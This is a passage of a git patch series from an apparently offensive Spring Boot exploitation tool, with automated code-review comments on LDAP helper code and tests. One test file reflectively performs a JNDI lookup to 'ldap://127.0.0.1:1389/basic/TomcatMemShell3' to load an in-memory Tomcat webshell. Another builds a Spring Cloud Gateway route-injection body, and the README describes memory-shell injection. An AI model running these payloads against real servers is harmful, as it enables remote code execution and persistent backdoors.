this.initLDAPContext(); + Attributes matchAttrs = new BasicAttributes(true); + matchAttrs.put(new BasicAttribute("objectclass", "posixGroup")); + matchAttrs.put(new BasicAttribute("cn", groupName)); + matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); + matchAttrs.put(new BasicAttribute("userPassword", password)); + try { + context.bind("cn=" + groupName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Delete LDAP user + * @param userName + */ + public void deleteLDAPUser(String userName){ + LdapContext context = this.initLDAPContext(); + try { + context.unbind(userName); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Delete LDAP user group + * @param groupName + */ + public void deleteLDAPUserGroup(String groupName){ + this.deleteLDAPUser(groupName); + } + + /** + * Modify LDAP user attribute with new value + * @param userName + * @param attributeName + * @param attributeNewValue + */ + public void updateLDAPUserAttribute(String userName, String attributeName, String attributeNewValue){ + LdapContext context = this.initLDAPContext(); + ModificationItem[] mods = new ModificationItem[1]; + mods[0] = new ModificationItem(context.REPLACE_ATTRIBUTE, new BasicAttribute(attributeName, attributeNewValue)); + try{ + context.modifyAttributes(userName, mods); + }catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Search LDAP users by user dn and filter + * @param userName + * @param filter + * @return NamingEnumeration + */ + public NamingEnumeration searchLDAPUser(String userName, String filter){ + NamingEnumeration searchResults = null; + LdapContext context = this.initLDAPContext(); + SearchControls ctrl = new SearchControls(); + ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE); + try { + 
searchResults = context.search(userName, filter, ctrl); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + return searchResults; + } + + private LdapContext initLDAPContext(){ + LdapContext context = null; + Properties mEnv = new Properties(); + mEnv.put(LdapContext.AUTHORITATIVE, "true"); + mEnv.put(LdapContext.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); + mEnv.put(LdapContext.PROVIDER_URL, this.ldapUrl); + mEnv.put(LdapContext.SECURITY_AUTHENTICATION, "simple"); + mEnv.put(LdapContext.SECURITY_PRINCIPAL, this.ldapUserDN); + mEnv.put(LdapContext.SECURITY_CREDENTIALS, this.ldapPwd); + try { + context = new InitialLdapContext(mEnv,null); + } catch (NamingException e) { + e.printStackTrace(); + } + return context; + } + + private void closeLdapContext(LdapContext context){ + try { + context.close(); + } catch (NamingException e) { + e.printStackTrace(); + } + } +} \ No newline at end of file diff --git a/src/test/java/gateway.java b/src/test/java/gateway.java new file mode 100644 index 0000000..35d6183 --- /dev/null +++ b/src/test/java/gateway.java 
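Review bot: `initLDAPContext` returns `null` when `new InitialLdapContext` throws, and every caller immediately dereferences the result (`context.bind`, `context.unbind`, `context.modifyAttributes`, `context.search`) and then `closeLdapContext` calls `context.close()` on it, so a connection failure surfaces as a `NullPointerException` instead of the original `NamingException`; replace `e.printStackTrace();` there with `throw new IllegalStateException("LDAP context init failed for " + this.ldapUrl, e);`. `searchLDAPUser` closes the context in `finally` before handing back the `NamingEnumeration`, so the caller iterates results whose context is already closed; collect them into a `List<SearchResult>` before closing and return that. `context.REPLACE_ATTRIBUTE` should be referenced statically as `DirContext.REPLACE_ATTRIBUTE`, and the hard-coded base DN `ou=People,dc=asiainfo,dc=com` plus the DN and filter strings assembled from unescaped `userName` deserve a comment marking them as test-only assumptions.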
@@ -0,0 +1,37 @@ +import com.drops.utils.StringRandom; + +/** + * @ClassName: gateway + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:46 + * @Version: v1.0.0 + * @Description: + **/ +public class gateway { + public static void main(String[] args) { + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"http://example.com\",\n" + + " \"order\": 0\n" + + "}", endpoint, endpoint); + + System.out.println(body); + + + String res = "Response Headers: \n" + + " null=[HTTP/1.1 200 OK]\n" + + " Content-Length=[7]\n" + + " Content-Type=[text/html;charset=UTF-8]\n" + + "Response Body: \n" + + " s0gjvh"; + System.out.println(res.contains("s0gjvh")); + + } + +} diff --git a/src/test/java/spel.java b/src/test/java/spel.java new file mode 100644 index 0000000..ee185f8 --- /dev/null +++ b/src/test/java/spel.java 
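Review bot: `gateway` is a lowercase class name holding a `main` that prints a formatted body and `res.contains("s0gjvh")` against a hard-coded response string, so nothing here is actually checked; give it an UpperCamelCase name (the same applies to `spel` in the next hunk) and turn the two prints into assertions, e.g. `assert body.contains(endpoint);`. The class Javadoc keeps the `@Description: TODO` placeholder and a duplicated `@Description` tag.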
@@ -0,0 +1,31 @@ +import javax.naming.InitialContext; +import javax.naming.NamingException; +import java.lang.reflect.InvocationTargetException; + +/** + * @ClassName: spel + * @Description: TODO + * @Author: Summer + * @Date: 2021年8月23日 11:39 + * @Version: v1.0.0 + * @Description: + **/ +public class spel { + public static void main(String[] args) { + try { +// javax.naming.InitialContext context = new InitialContext(); +// context.lookup("ldap://127.0.0.1:1389/basic/TomcatMemShell3"); + + java.lang.Class.forName("javax.naming.InitialContext").getMethod("lookup", String.class).invoke(Class.forName("javax.naming.InitialContext").newInstance(),"ldap://127.0.0.1:1389/basic/TomcatMemShell3"); +// new javax.naming.InitialContext().lookup(""); + } catch ( ClassNotFoundException | NoSuchMethodException e) { + e.printStackTrace(); + } catch (InvocationTargetException e) { + e.printStackTrace(); + } catch (IllegalAccessException e) { + e.printStackTrace(); + } catch (InstantiationException e) { + e.printStackTrace(); + } + } +} From 04b82d66246e868a97dea50c0ae7b05abc1d7417 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:28:57 +0800 Subject: [PATCH 2/8] .gitignore --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..1735804 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +target/** +.idea/** \ No newline at end of file From eb1359dc9633bf27774d60a5b51624ee5ef4989a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:41:04 +0800 Subject: [PATCH 3/8] Update maven.yml --- .github/workflows/maven.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index c0438c9..ec7fc5d 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml 
@@ -24,7 +24,7 @@ jobs: java-package: jdk+fx - name: Build with Maven run: - mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V -X - name: Create Release id: create_release uses: SummerSec/create-release@master @@ -56,6 +56,6 @@ jobs: GITHUB_TOKEN: ${{secrets.RELEASE}} with: upload_url: ${{ steps.create_release.outputs.upload_url }} - asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar - asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_path: /home/runner/work/SpringBootExploit/SpringBootExploit/target/SpringBootExploit-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_name: SpringBootExploit-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar asset_content_type: application/java-archive From 2a68ab30ead424910df35c3164d8b148a59e2883 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:41:47 +0800 Subject: [PATCH 4/8] Update maven.yml --- .github/workflows/maven.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index ec7fc5d..18d80da 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml @@ -2,11 +2,11 @@ name: Release Maven -on: - push: - tags: - - '*' -#on: [push] +# on: +# push: +# tags: +# - '*' +on: [push] From bdacfb5cb64170a3c84a1a0d233569373932dd3a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:43:49 +0800 Subject: [PATCH 5/8] pom.xml --- .idea/compiler.xml | 2 +- pom.xml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.idea/compiler.xml b/.idea/compiler.xml index 10d5eae..7626265 100644 --- a/.idea/compiler.xml +++ b/.idea/compiler.xml @@ -16,7 +16,7 @@ \ No newline at end of file 
diff --git a/pom.xml b/pom.xml index 9d6fb69..e62b68a 100644 --- a/pom.xml +++ b/pom.xml @@ -24,9 +24,9 @@ 7 7 UTF-8 - - D:/java/jre/lib/rt.jar;D:/java/jre/lib/jce.jar - + + + From ae6b6d769eae7046281772324459b3d94afdcf8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:47:30 +0800 Subject: [PATCH 6/8] Update maven.yml --- .github/workflows/maven.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index 18d80da..c17120d 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml @@ -2,11 +2,11 @@ name: Release Maven -# on: -# push: -# tags: -# - '*' -on: [push] +on: + push: + tags: + - '*' +# on: [push] @@ -24,7 +24,7 @@ jobs: java-package: jdk+fx - name: Build with Maven run: - mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V -X + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V - name: Create Release id: create_release uses: SummerSec/create-release@master From 697cb17e1a1546fc7ca230e61eeeab5a80beaac9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 22:08:02 +0800 Subject: [PATCH 7/8] jndiexploit --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index b8ab2f4..bf779bc 100644 --- a/README.md +++ b/README.md @@ -46,7 +46,7 @@ 1. 从[releases](https://github.com/0x727/SpringBootExploit/releases)下载最新版Spring Boot Exploit压缩包,配合[JNDIExploit](https://github.com/0x727/JNDIExploit)使用。(:star:推荐) 2. 1. git clone https://github.com/0x727/SpringBootExploit - 2. git clone https://github.com/0x727/JNDIExploit + 2. git clone https://github.com/0x727/JNDIExploit (目前不对外开放) 3. mvn clean package -DskipTests 分别打SpringBootExploit包和JNDIExploit From 2a56ec19ee2c69195bbe7ee950cb9c78f60463ac Mon Sep 17 00:00:00 2001 
From: SummerSec <47944478+summersec@users.noreply.github.com> Date: Mon, 7 Nov 2022 10:30:45 +0800 Subject: [PATCH 8/8] Update README.md update image links --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index bf779bc..5de8b2e 100644 --- a/README.md +++ b/README.md @@ -60,19 +60,19 @@ -![image-20210812105637728](https://gitee.com/samny/images/raw/master/summersec//5u57er5ec/5u57er5ec.png) +![image](https://user-images.githubusercontent.com/47944478/200214227-e6c61ef1-6068-4553-a083-0c2d203591b1.png) 3. 漏洞利用 建议首先点击检测环境,会自动判断是否存在漏洞。漏洞验证方法是Check list的方法,如果有更好的方法可以提交工单会考虑添加。 - ![image-20210812110100966](https://gitee.com/samny/images/raw/master/summersec//1u01er1ec/1u01er1ec.png) + ![image](https://user-images.githubusercontent.com/47944478/200214192-796332cf-fd56-4f30-b624-e17d2137aa8c.png) + 4. 漏洞利用,目前只支持内存马注入 ![image-20210812110245884](https://gitee.com/samny/images/raw/master/summersec//45u02er45ec/45u02er45ec.png) - -![image-20210812110337585](https://gitee.com/samny/images/raw/master/summersec//37u03er37ec/37u03er37ec.png) +![image](https://user-images.githubusercontent.com/47944478/200214251-03571a05-ae55-47be-88b6-00cd5de4a737.png)
